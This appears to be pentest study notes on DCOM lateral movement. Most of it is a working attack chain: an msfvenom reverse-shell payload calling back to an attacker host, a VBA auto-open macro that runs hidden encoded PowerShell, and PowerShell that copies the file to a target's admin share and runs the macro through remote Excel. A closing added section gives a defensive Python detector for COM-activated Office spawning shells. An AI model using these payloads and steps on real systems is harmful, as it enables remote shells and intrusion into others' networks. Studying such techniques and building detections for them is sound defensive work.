DCOM Exploitation
24.10.1 - Distributed Component Object Model (DCOM)
- DCOM allows a computer to run programs over the network on a different computer e.g. Excel/PowerPoint/Outlook
- Requires RPC port 135 and local admin access to call the DCOM Service Control Manager - the API.
- The Run method within DCOM allows us to execute a VBA macro remotely.
DCOM - create payload and VBA macro
(Kali) create rshell payload
msfvenom -p windows/shell_reverse_tcp LHOST=[kali] LPORT=4444 -f hta-psh -o evil.hta
(Python) split payload into smaller chunks
# Emit one VBA concatenation line per 50-character chunk of the command
payload = "powershell.exe -nop -w hidden -e {base64_encoded_payload}"
n = 50
for i in range(0, len(payload), n):
    print('Str = Str + "' + payload[i:i+n] + '"')
Create VBA macro -> insert into Excel file
Sub AutoOpen()
    exploit
End Sub
Sub Document_Open()
    exploit
End Sub
Sub exploit()
    Dim str As String
    {insert_payload_here}
    ' OPTION 1
    Shell (Str)
    ' OPTION 2
    ' CreateObject("Wscript.Shell").Run str
End Sub
Check if document contains valid exploit macro
mraptor [exploit.doc]
DCOM - Copy file to remote and execute
Copy Excel file containing VBA payload to target
$LocalPath = "C:\Users\<local_user>\badexcel.xls"
$RemotePath = "\\<target>\C$\Users\<target_user>\badexcel.xls"
[System.IO.File]::Copy($LocalPath, $RemotePath, $true)
Create a remote DCOM object (Excel on the target)
$com = [Activator]::CreateInstance([Type]::GetTypeFromProgID("Excel.Application", "<target>"))
Make Excel visible (optional, often set to false for stealth)
$com.Visible = $false
Open the Excel file (on remote system, not your local C:)
$workbook = $com.Workbooks.Open("C:\Users\<target_user>\badexcel.xls")
Run macro (if macro is auto-enabled and trusted)
$com.Run("mymacro")
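Detection view of the steps above: on the target they typically show up as an Office binary started by svchost.exe with the -Embedding switch, which then spawns a shell. The following is an added example, not part of the original notes, that matches this process tree over constructed process-creation events; the Sysmon Event ID 1 field names, hosts and PIDs are assumptions.

```python
# Added example: flag Office processes that were COM-activated (as in the DCOM
# steps above) and then spawned a shell. Assumes time-ordered Sysmon EID 1 dicts.
import ntpath

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()

def is_dcom_activated_office(ev):
    """Office app started by COM activation: svchost parent plus -Embedding."""
    return (base(ev["Image"]) in OFFICE
            and base(ev["ParentImage"]) == "svchost.exe"
            and "-embedding" in ev["CommandLine"].lower())

def detect(events):
    """Return (office_event, child_event) pairs: COM-activated Office -> shell."""
    activated = {}  # (host, pid) -> Office process-creation event
    hits = []
    for ev in events:
        host = ev["Computer"]
        if is_dcom_activated_office(ev):
            activated[(host, ev["ProcessId"])] = ev
            continue
        parent = activated.get((host, ev["ParentProcessId"]))
        if parent and base(ev["Image"]) in SHELLS:
            hits.append((parent, ev))
    return hits

def _ev(host, pid, ppid, image, parent, cmd):
    return {"Computer": host, "ProcessId": pid, "ParentProcessId": ppid,
            "Image": image, "ParentImage": parent, "CommandLine": cmd}

XL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events (hosts, PIDs and command lines are made up).
SAMPLE_EVENTS = [
    _ev("WS01", 4100, 3000, XL, r"C:\Windows\explorer.exe", f'"{XL}" report.xlsx'),
    _ev("WS01", 4200, 3000, PS, r"C:\Windows\explorer.exe", "powershell.exe"),
    _ev("WS02", 5200, 900, XL, r"C:\Windows\System32\svchost.exe",
        f'"{XL}" /automation -Embedding'),
    _ev("WS02", 5300, 5200, PS, XL, "powershell.exe -nop -w hidden -e <base64>"),
]

if __name__ == "__main__":
    for office, child in detect(SAMPLE_EVENTS):
        print(office["Computer"], office["ProcessId"], "->", child["CommandLine"])
```

Local OLE activation produces the same -Embedding command line, so correlating a hit with a preceding network logon (Event ID 4624, logon type 3) on the same host narrows it to remote activation.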